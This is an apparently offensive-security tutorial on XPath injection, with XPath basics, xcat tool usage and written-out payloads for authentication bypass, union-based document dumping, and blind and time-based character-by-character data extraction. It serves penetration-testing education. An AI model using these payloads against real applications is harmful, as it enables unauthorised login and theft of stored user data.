XPath Injection

XML Path Language (XPath) is a query language for retrieving data from XML documents. It is typically used in web applications that retrieve data stored in an XML format.

When an application inserts user input into XPath queries without proper sanitization, an attacker can manipulate those queries. Successful exploitation can expose the entire XML document, giving the attacker access to all data stored in it.

Automatic Injection using XCAT

pip3 install cython
pip3 install xcat

Usage: xcat [OPTIONS] COMMAND [ARGS]...

The commands are:
 detect: detect and print the type of injection found
 injections: print all types of injection supported by xcat
 ip: print the current external IP address
 run: retrieve the XML document by exploiting the XPath injection
 shell: xcat shell to run system commands

Find more info on commands using:
 xcat <command> --help.

Detect if a non-blind endpoint is vulnerable to XPath Injection: xcat detect <url> <vulnerable-param> param1=value1 param2=value2 --true-string='invalid-input-string'

Exfiltrate the XML document (via POST request): xcat run <url> <vulnerable-param> param1=value1 --true-string=successfully -m POST --encode FORM


XPath Fundamentals

Basic Concepts

XML documents contain data formatted in a tree structure of nodes with the top element being the root element node. Each node aside from the root has exactly one parent node, while each element node may have an arbitrary number of child nodes.

Nodes with the same parent are called sibling nodes. Traversing upwards or downwards from a given node determines all its ancestor nodes or descendant nodes.

An example XML document would be the following:

<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
  <book>
    <title lang="en">The name of the rose</title>
    <author>Umberto Eco</author>
    <price currency="dollar">5,00</price>
    <category>Novel</category>
  </book>
</bookstore>

In the example:

  • bookstore is the root element node.

  • book, title, author, price and category are element nodes.

  • lang and currency are attribute nodes.

  • title, author, price and category are siblings, with book being their parent.
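
As a minimal sketch of this tree structure, the example document can be loaded with Python's standard xml.etree.ElementTree module. The module choice and the variable names are assumptions made for illustration only.

```python
import xml.etree.ElementTree as ET

# The example document from above, passed as bytes so the encoding
# declaration is handled by the parser.
DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
  <book>
    <title lang="en">The name of the rose</title>
    <author>Umberto Eco</author>
    <price currency="dollar">5,00</price>
    <category>Novel</category>
  </book>
</bookstore>"""

root = ET.fromstring(DOC)                  # root element node
book = root[0]                             # first (and only) child of the root
siblings = [child.tag for child in book]   # element nodes whose parent is book
# Attribute nodes, grouped by the element node that carries them.
attributes = {child.tag: dict(child.attrib) for child in book if child.attrib}

print(root.tag)     # bookstore
print(siblings)     # ['title', 'author', 'price', 'category']
print(attributes)   # {'title': {'lang': 'en'}, 'price': {'currency': 'dollar'}}
```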

Selecting Data

Each XPath query selects a set of nodes from the XML document. A query is evaluated from a context node, which marks its starting point. This means that, depending on the context node, the same query may have different results.

The following notes only consider the abbreviated syntax. For more details on the XPath syntax, look at the W3C specification.

There are several ways to select nodes in XPath. Some basic example queries are:

Query              Explanation

example            Select all example child nodes of the context node
/                  Select the document root node
//                 Select descendant nodes of the context node
.                  Select the context node
..                 Select the parent node of the context node
@attributeName     Select the attributeName attribute node of the context node
text()             Select all text node child nodes of the context node
query1 | query2    Combine multiple queries with the union operator

Starting from the previous basic queries, it is possible to construct more complex queries, such as:

  • /bookstore/book - Select all book child nodes of the bookstore node

  • /bookstore//title - Select all title nodes that are descendant of the bookstore node

  • /bookstore/book/price/@currency - Select all currency attribute nodes of all price nodes under book elements that are child nodes of the bookstore node

  • //book - Select all books

  • //@currency - Select all currency attribute nodes
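
The path queries above can be tried out with a short sketch. It assumes Python's standard xml.etree.ElementTree module, which implements only a subset of XPath: paths are relative to the element they are called on, and attribute steps are not supported, so the queries are adapted accordingly. A full XPath engine would accept them verbatim.

```python
import xml.etree.ElementTree as ET

DOC = b"""<bookstore>
  <book>
    <title lang="en">The name of the rose</title>
    <author>Umberto Eco</author>
    <price currency="dollar">5,00</price>
    <category>Novel</category>
  </book>
</bookstore>"""

root = ET.fromstring(DOC)  # the bookstore element is the starting point

# "book" relative to the root corresponds to /bookstore/book.
books = root.findall("book")

# ".//title" relative to the root corresponds to /bookstore//title.
titles = [t.text for t in root.findall(".//title")]

# ElementTree cannot select attribute nodes directly, so the attribute is
# read from the selected price elements (stand-in for /bookstore/book/price/@currency).
currencies = [p.get("currency") for p in root.findall("book/price")]

print(len(books))   # 1
print(titles)       # ['The name of the rose']
print(currencies)   # ['dollar']
```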

Filtering data via Predicates

Predicates filter the result from an XPath query similar to the WHERE clause in a SQL query.

Predicates are part of the XPath query and are contained within []. Some examples are:

  • /bookstore/book[1] - Select the first book child of the bookstore node

  • /bookstore/book[position()<10] - Select the first 9 books

  • //book/title[@lang]/../category - Select the category of all books with a title having a language
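
A small sketch of predicates in action, again assuming Python's standard xml.etree.ElementTree module (which supports only some predicate forms) and a hypothetical two-book document in which the second title has no lang attribute:

```python
import xml.etree.ElementTree as ET

# Hypothetical document used only for this illustration.
DOC = b"""<bookstore>
  <book>
    <title lang="en">The name of the rose</title>
    <category>Novel</category>
  </book>
  <book>
    <title>Il pendolo di Foucault</title>
    <category>Fiction</category>
  </book>
</bookstore>"""

root = ET.fromstring(DOC)

# Positional predicate: title of the first book.
first_title = [t.text for t in root.findall("book[1]/title")]

# Positional predicate using last(): title of the last book.
last_title = [t.text for t in root.findall("book[last()]/title")]

# Attribute predicate followed by a parent step: category of every book
# whose title carries a lang attribute.
categories = [c.text for c in root.findall(".//title[@lang]/../category")]

print(first_title)   # ['The name of the rose']
print(last_title)    # ['Il pendolo di Foucault']
print(categories)    # ['Novel']
```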

It is also possible to use wildcards such as

  • node() - Matches any node

  • * - Matches any element node

  • @* - Matches any attribute node


Authentication Bypass

An application might implement authentication via XML data containing all users' credentials.

In this case, to perform authentication, the web application might execute an XPath query that checks the submitted credentials, such as the following:

/users/user[username/text()='<username>' and password/text()='<password>']

If no checks are performed on user input, authentication can be bypassed with input that makes the predicate always evaluate to true, such as

username = ' or '1'='1
password = ' or '1'='1

resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='' or '1'='1']

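The predicate is now true for every user node, so the query returns all users. Applications typically take the first result, which logs us in as the first user in the XML data.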

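If a valid username is known, it is possible to inject it together with a true condition for the password, such as

username = administrator
password = ' or '1'='1

resulting query:
/users/user[username/text()='administrator' and password/text()='' or '1'='1']

Note that and binds more tightly than or in XPath, so this predicate reads (username check and password check) or '1'='1' and is true for every user node, not only for administrator. Whether we end up logged in as administrator therefore depends on how the application picks a user from the result. To match only the known user regardless of the password, the username payload administrator' or '1'='2 can be used instead: it yields username/text()='administrator' or ('1'='2' and password/text()='<password>'), which is true only for administrator.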

In more realistic cases, we might not know any valid username. Also, the password is most likely hashed before it is inserted into the query, so a payload placed in the password field is hashed as well and never reaches the query as XPath syntax. For example:

username = ' or '1'='1
password = ' or '1'='1

resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='<MD5-hash>']

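Because and binds more tightly than or, this predicate reduces to the password comparison and matches no user. To bypass authentication in these cases, we can inject two or conditions in the username so that the predicate is true regardless of the password check, for example: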

username = ' or true() or '
password = ' or '1'='1

resulting query:
/users/user[username/text()='' or true() or '' and password/text()='<MD5-hash>']
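
The difference between the single or payload and the double or payload comes down to operator precedence. The sketch below is not an XPath engine: it models the two predicates with Python booleans, relying on the fact that and binds more tightly than or in both languages. The user records and hash values are hypothetical.

```python
# Hypothetical user records standing in for the <user> nodes.
USERS = [
    {"username": "administrator", "password": "hash-a"},
    {"username": "sfoffo", "password": "hash-b"},
]
SUBMITTED_HASH = "hash-of-payload"  # hash of whatever was typed as the password


def single_or(user):
    # Models: username/text()='' or '1'='1' and password/text()='<MD5-hash>'
    return user["username"] == "" or "1" == "1" and user["password"] == SUBMITTED_HASH


def double_or(user):
    # Models: username/text()='' or true() or '' and password/text()='<MD5-hash>'
    # An empty string converts to false in XPath, as bool("") does in Python.
    return user["username"] == "" or True or bool("") and user["password"] == SUBMITTED_HASH


single_matches = [u["username"] for u in USERS if single_or(u)]
double_matches = [u["username"] for u in USERS if double_or(u)]

print(single_matches)   # []
print(double_matches)   # ['administrator', 'sfoffo']
```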

Again, this logs us in as the first user in the XML data. To log in as another user without knowing their username, we can use the position() function:

username = ' or position()=2 or '
password = ' or '1'='1

resulting query:
/users/user[username/text()='' or position()=2 or '' and password/text()='<MD5-hash>']

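Lastly, we can use the contains() function to match users whose data contains a specific substring. This allows targeting accounts whose usernames contain a word we might know or guess, such as admin. Since . refers to the whole user node in this predicate, the substring is searched in all of the node's text, not only in the username.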

username = ' or contains(.,'admin') or '
password = ' or '1'='1

resulting query:
/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='<MD5-hash>']
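
To see how each username payload ends up in the final query, the following sketch mimics a vulnerable application that builds the query by plain string interpolation. The function name and the template constant are hypothetical; the payloads are the ones from this section.

```python
# Query template from this section, with format placeholders for the inputs.
TEMPLATE = "/users/user[username/text()='{username}' and password/text()='{password}']"


def build_login_query(username: str, password: str) -> str:
    """Naive string interpolation, as a vulnerable application might do it."""
    return TEMPLATE.format(username=username, password=password)


USERNAME_PAYLOADS = [
    "' or true() or '",
    "' or position()=2 or '",
    "' or contains(.,'admin') or '",
]

for payload in USERNAME_PAYLOADS:
    # The password is shown as the placeholder used above, since it is hashed.
    print(build_login_query(payload, "<MD5-hash>"))
```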

Data Exfiltration

Union Based

We can try to access arbitrary data from XML documents using techniques similar to UNION-based SQL injections. For this example, consider a bookstore web application with a search functionality that uses two GET parameters:

  • ?q=<input> - finds books containing the user's search string.

  • &f=<input> - selects a property of the book to display (example: title)

By analyzing the web application's behavior, we can deduce the general shape of the XPath query it performs:

/a/b/c[contains(d/text(), 'q')]/f

which, considering an HTTP request such as:

GET /search.php?q=harrypotter&f=title HTTP/1.1

would become:

/a/b/c[contains(d/text(), 'harrypotter')]/title

Since we know neither the names nor the depth of the element nodes in the XML document, the path is an educated guess, and a, b, c, and d are single-character placeholder names. We will discuss how to determine the schema depth in the next section.

The search string we provide in the GET parameter q is inserted in the predicate that filters the books using the contains function. After that, the GET parameter f determines the property the web application displays from all matching books (title, for example), which is why it is appended at the end of the query.

We can confirm XPath injection by sending the payload a') or ('1'='1 in the q parameter and leaving the f parameter set to title. This would result in the following XPath query:

/a/b/c[contains(d/text(), 'a') or ('1'='1')]/title

Regardless of whether the provided substring matches, the injected or clause evaluates to true, so the predicate is true for every node at that depth. With this payload, the web application responds with all book titles, confirming the XPath injection vulnerability.

The next step is to construct a query that returns the entire XML document. The simplest approach is to append a new query that returns all text nodes:

GET /search.php?q=SOMETHINGINVALID&f=title+|+//text() HTTP/1.1

The web application will then execute the following query:

/a/b/c[contains(d/text(), 'SOMETHINGINVALID')]/title | //text()

We are appending a second query with the | operator, similar to a UNION-based SQL injection. The second query, //text(), returns all text nodes in the XML document. Therefore, the response contains all data stored in the XML document.
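
The two requests from this section can be built with correct URL encoding as sketched below. The host name is a placeholder and the helper name is hypothetical; only the path and the q and f parameters come from the example. No request is sent.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

BASE_URL = "http://target.example/search.php"  # hypothetical host


def build_search_url(q: str, f: str) -> str:
    """Encode both parameters so quotes, pipes and slashes survive transport."""
    return f"{BASE_URL}?{urlencode({'q': q, 'f': f})}"


# Confirmation payload in q, and the union payload in f.
confirm_url = build_search_url("a') or ('1'='1", "title")
dump_url = build_search_url("SOMETHINGINVALID", "title | //text()")

print(confirm_url)
print(dump_url)

# Decoding the query string again shows what the application would receive.
decoded = parse_qs(urlsplit(dump_url).query)
print(decoded["f"][0])   # title | //text()
```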

Identifying the Schema Depth

It isn't always possible to extract all of the document's data in one shot: the application may display only a limited number of results from an XPath query, in which case you can only access one piece of information at a time.

To exfiltrate all the document's data in this scenario, we need information about the schema's structure and depth. We can obtain it iteratively: each injected request makes the original XPath query return no results and appends a new subquery that reveals something about the schema depth.

In particular, we can inject the union operator followed by a subquery that starts at the document root element node: <XPath Query> | /*[1]

By doing that, the web application will most probably not return data: it expects a single value, but the injected subquery selects the document root element node, which contains child element nodes rather than a single text value.

We can determine the depth of the XML document by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes:

<XPath Query> | /*[1]
<XPath Query> | /*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
.....

Once the web application finally returns some data, we can deduce that the schema depth is at least equal to the number of /*[1] steps appended.

To retrieve the information in all element nodes, we iterate over the previous payload, changing the index of the last step from the first child to the second, then the third, and so on:
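
The depth probing can be automated along these lines. This is a sketch under assumptions: returns_data is a hypothetical callable that sends <XPath Query> | subquery to the target and reports whether the response contained data, and it is replaced here by a stand-in so the example runs offline.

```python
from typing import Callable, Optional


def find_depth(returns_data: Callable[[str], bool], max_depth: int = 20) -> Optional[int]:
    """Append /*[1] steps until the application starts returning data."""
    for depth in range(1, max_depth + 1):
        subquery = "/*[1]" * depth
        if returns_data(subquery):
            return depth
    return None  # no change in behavior within max_depth steps


# Stand-in oracle: pretends the first displayable value sits four levels deep.
def fake_returns_data(subquery: str) -> bool:
    return subquery.count("/*[1]") >= 4


print(find_depth(fake_returns_data))   # 4
```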

<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
<XPath Query> | /*[1]/*[1]/*[1]/*[3]
<XPath Query> | /*[1]/*[1]/*[1]/*[4]
.....

To exfiltrate an entire XML document this way, it makes sense to write a script that performs the iterative steps automatically.

Iterating this process over all element nodes gives access to the entire XML document.

Example iteration: 
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
.....
<XPath Query> | /*[1]/*[1]/*[2]/*[1]
<XPath Query> | /*[1]/*[1]/*[2]/*[2]
<XPath Query> | /*[1]/*[1]/*[2]/*[3]
.....
<XPath Query> | /*[1]/*[2]/*[1]/*[1]
<XPath Query> | /*[1]/*[2]/*[1]/*[2]
.....
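
A script for this iteration could generate the subqueries as follows. This is a minimal sketch: the function name is hypothetical, the depth is assumed to be known from the previous step, and max_index is an assumed upper bound on the number of children per node.

```python
from itertools import product
from typing import Iterator


def index_paths(depth: int, max_index: int) -> Iterator[str]:
    """Yield /*[1]/*[i]/*[j]/... subqueries, varying the last index fastest."""
    # The first step is always the single document root element.
    for indexes in product(range(1, max_index + 1), repeat=depth - 1):
        yield "/*[1]" + "".join(f"/*[{i}]" for i in indexes)


paths = list(index_paths(depth=4, max_index=2))
for path in paths:
    print(f"<XPath Query> | {path}")
```

Each generated line would then be sent in place of the injected parameter, and the non-empty responses collected.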

Blind Exfiltration

As with blind SQL injection, the web application may not display the query results to us, but it may still be possible to exfiltrate data. Unlike SQL, XPath has no sleep function, so we need other indicators that tell us whether an injected condition evaluated to true.

The idea behind blind exfiltration is to enumerate the names of element nodes, so that we can construct XPath queries without wildcards and narrow them down to interesting data points.

Four functions help with this process:

  • name(): allows determining a node's name

  • substring(): exfiltrate a node name one character at a time

  • string-length(): determine the length of a node name to know when to stop the exfiltration

  • count(): returns the number of children of an element node.

Consider an example web application that allows users to chat. The web application starts a chat with a user via the page chat.php?username=sfoffo

If a chat is started with an invalid username, the web application prints an error message. If the username is valid, the chat page is opened. This difference in responses is the indicator we rely on to perform the blind exfiltration.

Since the application performs a user existence check, we can guess that the underlying XPath query is similar to the following: /users/user[username='input']. To confirm, we can use a payload such as invalid' or '1'='1 to obtain the query: /users/user[username='invalid' or '1'='1']. The application will then act as if a valid username was found, since the check returns true.
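
The response difference can be wrapped into a boolean oracle, sketched below. The host name, the error text and the function names are assumptions; fetch is any callable that takes a URL and returns the response body, replaced here by a stand-in so the example runs without network access.

```python
from typing import Callable
from urllib.parse import quote, unquote

CHAT_URL = "http://target.example/chat.php?username="  # hypothetical host
ERROR_MARKER = "User not found"                         # hypothetical error text


def make_oracle(fetch: Callable[[str], str]) -> Callable[[str], bool]:
    """Build a function that reports whether a payload made the check true."""
    def oracle(payload: str) -> bool:
        body = fetch(CHAT_URL + quote(payload, safe=""))
        return ERROR_MARKER not in body
    return oracle


# Stand-in for the target: opens the chat only for the always-true payload.
def fake_fetch(url: str) -> str:
    payload = unquote(url.split("username=", 1)[1])
    return "chat opened" if payload.endswith("or '1'='1") else ERROR_MARKER


oracle = make_oracle(fake_fetch)
print(oracle("invalid' or '1'='1"))   # True
print(oracle("invalid"))              # False
```

Against a real target, fetch would perform the HTTP request and return the decoded body.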

1. Exfiltrating the Length of a Node Name

To exfiltrate the length of the root node's name, we can use the following payload:

Payload:
 invalid' or string-length(name(/*[1]))=1 and '1'='1

Full Query:
 /users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']

This query returns data only if string-length(name(/*[1]))=1 is true, meaning the length of the root element node's name is 1. The payload needs to be repeated with increasing lengths (2, 3, and so on) until the application's response is the same as for a valid username.
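
The length search can be sketched as a simple loop. It assumes a hypothetical oracle callable that sends a payload and returns True when the application responds as it does for a valid username; a stand-in simulating a root node named users is used so the example runs offline.

```python
import re
from typing import Callable, Optional


def find_length(oracle: Callable[[str], bool], expression: str,
                max_length: int = 64) -> Optional[int]:
    """Try string-length(expression)=n for n = 1, 2, ... until the oracle agrees."""
    for n in range(1, max_length + 1):
        payload = f"invalid' or string-length({expression})={n} and '1'='1"
        if oracle(payload):
            return n
    return None


# Stand-in oracle: behaves as if the root element node were named "users".
def fake_oracle(payload: str) -> bool:
    match = re.search(r"\)=(\d+) and", payload)
    return match is not None and int(match.group(1)) == len("users")


print(find_length(fake_oracle, "name(/*[1])"))   # 5
```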

2. Exfiltrating a Node Name

Now that we know the length of the node's name, we can exfiltrate the name character by character.

To do that, we can use the substring() function:

Payload:
 invalid' or substring(name(/*[1]),1,1)='a' and '1'='1

Full Query:
 /users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']

The query returns data only if the first character of the root node's name equals a. This query needs to be repeated with each candidate character until the web application responds as it does for a valid username.

Finally, the payload needs to be repeated for the following character positions to find the entire node name:

invalid' or substring(name(/*[1]),2,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),3,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),4,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),5,1)='<letter>' and '1'='1
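
The character-by-character search could be scripted as in the sketch below. The oracle callable, the candidate character set and the function name are assumptions; the stand-in oracle again simulates a root node named users.

```python
import re
import string
from typing import Callable

# Candidate characters; quotes are left out because they would break the payload.
CHARSET = string.ascii_letters + string.digits + "_-."


def extract_string(oracle: Callable[[str], bool], expression: str,
                   length: int, charset: str = CHARSET) -> str:
    """Recover the string value of an XPath expression one character at a time."""
    result = ""
    for position in range(1, length + 1):   # XPath positions start at 1
        for char in charset:
            payload = (f"invalid' or substring({expression},{position},1)="
                       f"'{char}' and '1'='1")
            if oracle(payload):
                result += char
                break
        else:
            result += "?"   # character not in the candidate set
    return result


# Stand-in oracle: behaves as if the root element node were named "users".
def fake_oracle(payload: str) -> bool:
    match = re.search(r",(\d+),1\)='(.)'", payload)
    return match is not None and "users"[int(match.group(1)) - 1] == match.group(2)


print(extract_string(fake_oracle, "name(/*[1])", 5))   # users
```

The same function works for data values by passing a different expression, for example /users/user[1]/username.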

3. Exfiltrating the Number of Child Nodes

To determine the number of child nodes for a given node, we can use the count() function in a payload:

Payload:
 invalid' or count(/users/*)=1 and '1'='1

Full Query:
 /users/user[username='invalid' or count(/users/*)=1 and '1'='1']

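This query returns data only if the users node has exactly one child element node. As before, the number is incremented until the response matches that of a valid username.

After exfiltrating the number of child nodes, the same steps (name length, name, child count) can be repeated for each child node to map the entire document's structure.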
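
Counting child nodes follows the same pattern. In this sketch the oracle callable and the function name are hypothetical, and the stand-in oracle simulates a users node with three children.

```python
from typing import Callable, Optional


def count_children(oracle: Callable[[str], bool], path: str,
                   max_children: int = 100) -> Optional[int]:
    """Try count(path/*)=n for n = 0, 1, 2, ... until the oracle agrees."""
    for n in range(0, max_children + 1):
        payload = f"invalid' or count({path}/*)={n} and '1'='1"
        if oracle(payload):
            return n
    return None


# Stand-in oracle: behaves as if /users had exactly three child elements.
def fake_oracle(payload: str) -> bool:
    return "count(/users/*)=3 " in payload


print(count_children(fake_oracle, "/users"))   # 3
```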

4. Exfiltrating Data

After you have identified the XML document structure, you can proceed with data exfiltration using the same ideas already mentioned.

The first step is to find the number of characters in the first username:

Payload:
 invalid' or string-length(/users/user[1]/username)=1 and '1'='1

Full Query:
 /users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']

Then, find each character of the username, using the length found in the previous step:

Payload:
 invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1

Full Query:
 /users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']

Finally, iterate through all characters until the entire username is exfiltrated.

Time-Based Exploitation

In fully blind scenarios (where the response is the same whether the input is valid or not), it is possible to abuse the processing time of the web application to create behavior similar to a sleep function.

In particular, you can force the web application to iterate over the entire XML document many times by nesting calls to the count function inside predicates. The inner count can be re-evaluated for every node selected by the outer expression, so the work multiplies with each level of nesting and the processing time grows rapidly.

Consider a payload such as the following:

Payload:
invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

Full Query:
/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1']

If the condition substring(/users/user[1]/username,1,1)='a' is true, the second part of the and clause is evaluated, so the nested count iterates over the XML document repeatedly and causes a noticeable delay. If the condition is false, the nested count is never evaluated and the response arrives quickly, meaning that the first character of the username is not a.
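
A timing-based check could be sketched as follows. The function names, the threshold and the send callable (which would deliver the payload to the target) are assumptions; the stand-in simply sleeps when the tested condition matches a simulated username starting with s. In practice the threshold has to be calibrated against the normal response time of the target.

```python
import time
from typing import Callable

# Expensive expression from the payload above.
HEAVY = "count((//.)[count((//.))])"


def timing_payload(condition: str) -> str:
    """Wrap a condition so the expensive count only runs when it is true."""
    return f"invalid' or {condition} and {HEAVY} and '1'='1"


def is_slow(send: Callable[[str], object], payload: str, threshold: float) -> bool:
    """Return True if sending the payload takes longer than threshold seconds."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start > threshold


# Stand-in target: the simulated first username starts with "s".
def fake_send(payload: str) -> None:
    if ",1,1)='s' and count(" in payload:
        time.sleep(0.2)   # simulated delay caused by the nested count


guess_s = timing_payload("substring(/users/user[1]/username,1,1)='s'")
guess_a = timing_payload("substring(/users/user[1]/username,1,1)='a'")
print(is_slow(fake_send, guess_s, threshold=0.1))   # True
print(is_slow(fake_send, guess_a, threshold=0.1))   # False
```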

Using this idea, we can exfiltrate all the XML document's data.